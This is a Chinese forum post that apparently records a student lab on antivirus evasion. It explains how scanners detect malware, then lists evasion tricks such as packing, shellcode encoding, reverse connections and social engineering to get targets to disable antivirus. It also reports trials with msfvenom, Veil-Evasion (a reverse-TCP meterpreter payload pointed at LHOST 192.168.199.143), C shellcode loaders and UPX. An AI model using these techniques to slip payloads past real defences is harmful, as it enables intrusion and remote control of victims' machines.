尖REN 发布于2022年11月8日 分享 发布于2022年11月8日 免杀 概述 免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“反杀毒技术”。 被谁杀?当然是被杀毒软件(引擎)杀。所以,要做好免杀技术(防御),就要弄清杀毒方式(攻击),也就是这些杀毒软件是如何工作的。 恶意代码检测方式 基于特征码的检测 特征库,也就是我们平时说的病毒库,它记录了一些恶意软件的特征码,这些特征码由一个不大于64字节的特征串组成,根据自己检测出或网络上已发现报告的病毒,对其多段提取特征码,构成了对恶意软件查杀的重要因素; 杀毒软件都有着自己的庞大病毒库(实际上就是由特征码构成的一个数据库),杀毒时只需与特征码进行比对就可判断出软件是否有毒; 根据以上介绍,我总结了这种方式的查杀特点: 病毒库越大,杀毒有效率越高; 因为收集的是已发现病毒的特征码,所以误报率低; 对部分新型病毒没有抵抗性,无法抵御零日攻击,需要定期更新病毒库。 启发式恶意软件检测 “When I see a bird that walks like a duck and swims like a duck and quacks like a duck, I call that bird a duck.”对照恶意软件检测来主说,就是如果一个软件在干通常是恶意软件干的事,看起来了像个恶意软件,那我们就把它当成一个恶意软件吧! 用较为专业的角度来解释就是,分析对象文件与病毒特征库中的病毒原码进行比较,当二者匹配率大于某一值时(通常这一值较小,所以容易误报),杀毒软件就会将其列为可疑文件以进行下一步的除理。 总结出以下特点: 查杀效率极高,不需要依赖庞大的病毒库; 对新型病毒有较好的预防性,可以抵御零日攻击; 因为分析是“启发式”的、不精确的、概率性的,所以其误报率也不可忽略; F-Prot是一款杀毒软件,有三个启发引擎,可见其是比较强大的,但其误报我也深感无能为力啊(后文会介绍)…… 基于行为的恶意软件检测 其实这种检测与启发式的较为相近,都没有依赖病毒库,但是我感觉它比启发式更靠谱一点,它是在一种程序运行的状态下对其行为进行监控,如果有敏感行为会报毒,是一种动态的监测与捕捉; 总结出以下特点: 不过分依赖病毒库,效率高; 可以检测出获取权限等敏感行为,从这种意义上说,在一定程度上是可以抵御新型病毒的; 因为是对系统的一个动态监测,会占用部分系统资源。 免杀方式 只有弄懂了上述查杀原理,对免杀的方式才有更清晰的理解 改变特征码 加壳,通过加壳,让杀毒软件无法进行反汇编、逆向工程,进而无法分析代码 对shellcode进行编码、重组 改变行为 通讯方式 尽量使用反弹式连接(用的最多) 使用隧道技术 加密通讯数据 操作模式 基于内存操作 减少对系统的修改 其它方法 使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中 使用社会工程学类攻击,诱骗目标关闭AV软件、点击木马软件 纯手工打造一个恶意软件 实践过程 1.msfvenom直接生成meterpreter可执行文件 提交之后,有很多程序查到了它是个病毒 2 Msfvenom使用编码器 多次编码后 基本没有变化 3.使用evail-evasion use python/meterpreter/rev_tcp set LHOST 192.168.199.143 generate Please enter the base name for output files (default is 'payload'):hfhf 1 4.C语言调用Shellcode 这是目前通过数量最多的一个了 5.加壳,压缩壳UPX 数量较少,但仍未做到免杀,反而不如C语言调用Shellcode 链接帖子 意见的链接 分享到其他网站 更多分享选项…
.thumb.jpg.26764a69083eb4469b6d18365588b559.jpg)
推荐的帖子